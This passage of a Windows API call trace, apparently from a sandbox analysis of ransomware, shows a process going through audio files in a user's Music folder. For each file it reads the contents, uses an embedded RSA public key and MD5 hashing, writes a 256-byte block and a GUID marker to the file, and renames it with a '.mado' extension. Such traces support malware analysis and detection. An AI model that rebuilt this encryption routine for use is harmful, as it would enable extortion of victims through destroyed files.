[0204.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe388 [0204.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe400 [0204.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3d0 [0204.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe418 [0204.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.634] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x18d2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.634] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.634] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.634] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.634] CloseHandle (hObject=0x63c) returned 1 [0204.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74b68 [0204.635] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RGhn4WlYabIEdu76Vetx.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rghn4wlyabiedu76vetx.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RGhn4WlYabIEdu76Vetx.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rghn4wlyabiedu76vetx.wav.mado")) returned 1 [0204.636] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3104300, ftCreationTime.dwHighDateTime=0x1d5de3c, ftLastAccessTime.dwLowDateTime=0x86325960, ftLastAccessTime.dwHighDateTime=0x1d5e7d3, ftLastWriteTime.dwLowDateTime=0x86325960, ftLastWriteTime.dwHighDateTime=0x1d5e7d3, nFileSizeHigh=0x0, nFileSizeLow=0x460e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RkP8Cvb.mp3", cAlternateFileName="")) returned 1 [0204.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.637] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RkP8Cvb.mp3") returned=".mp3" [0204.637] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RkP8Cvb.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rkp8cvb.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.637] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=17934) returned 1 [0204.637] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.639] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x45e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.639] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.641] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x460e, lpOverlapped=0x0) returned 1 [0204.641] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.641] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.641] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.641] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.642] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.642] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.642] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.642] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.642] GetLastError () returned 0x0 [0204.642] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.642] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.642] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.642] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.642] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.643] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b79180 [0204.643] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x460e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.643] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.643] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.643] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.643] CloseHandle (hObject=0x63c) returned 1 [0204.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3b74b68 [0204.647] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RkP8Cvb.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rkp8cvb.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RkP8Cvb.mp3.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rkp8cvb.mp3.mado")) returned 1 [0204.649] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb4b5f30, ftCreationTime.dwHighDateTime=0x1d5e154, ftLastAccessTime.dwLowDateTime=0xf4ded0, ftLastAccessTime.dwHighDateTime=0x1d5d7e8, ftLastWriteTime.dwLowDateTime=0xf4ded0, ftLastWriteTime.dwHighDateTime=0x1d5d7e8, nFileSizeHigh=0x0, nFileSizeLow=0x66c3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RUu-fvF.m4a", cAlternateFileName="")) returned 1 [0204.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.649] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RUu-fvF.m4a") returned=".m4a" [0204.649] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RUu-fvF.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ruu-fvf.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.650] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=26307) returned 1 [0204.650] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.652] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x669d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.652] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.654] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x66c3, lpOverlapped=0x0) returned 1 [0204.654] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.655] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.655] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.655] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.655] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.655] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.655] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.655] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.656] GetLastError () returned 0x0 [0204.656] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.656] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.656] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.656] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.656] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.656] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b230 [0204.656] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x66c3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.656] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.656] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.656] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.657] CloseHandle (hObject=0x63c) returned 1 [0204.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3b74b68 [0204.658] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RUu-fvF.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ruu-fvf.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RUu-fvF.m4a.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ruu-fvf.m4a.mado")) returned 1 [0204.659] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe641190, ftCreationTime.dwHighDateTime=0x1d5e322, ftLastAccessTime.dwLowDateTime=0x42954c90, ftLastAccessTime.dwHighDateTime=0x1d5e241, ftLastWriteTime.dwLowDateTime=0x42954c90, ftLastWriteTime.dwHighDateTime=0x1d5e241, nFileSizeHigh=0x0, nFileSizeLow=0xa606, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sbt0zxWRYObY0T.mp3", cAlternateFileName="SBT0ZX~1.MP3")) returned 1 [0204.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.659] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Sbt0zxWRYObY0T.mp3") returned=".mp3" [0204.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Sbt0zxWRYObY0T.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sbt0zxwryoby0t.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.660] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=42502) returned 1 [0204.660] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.662] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa5e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.663] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.667] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xa606, lpOverlapped=0x0) returned 1 [0204.668] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.668] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.668] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.668] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.669] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.669] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.669] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.669] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.669] GetLastError () returned 0x0 [0204.669] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.669] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.669] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.669] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.669] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.669] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.670] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa606, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.670] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.670] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.670] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, 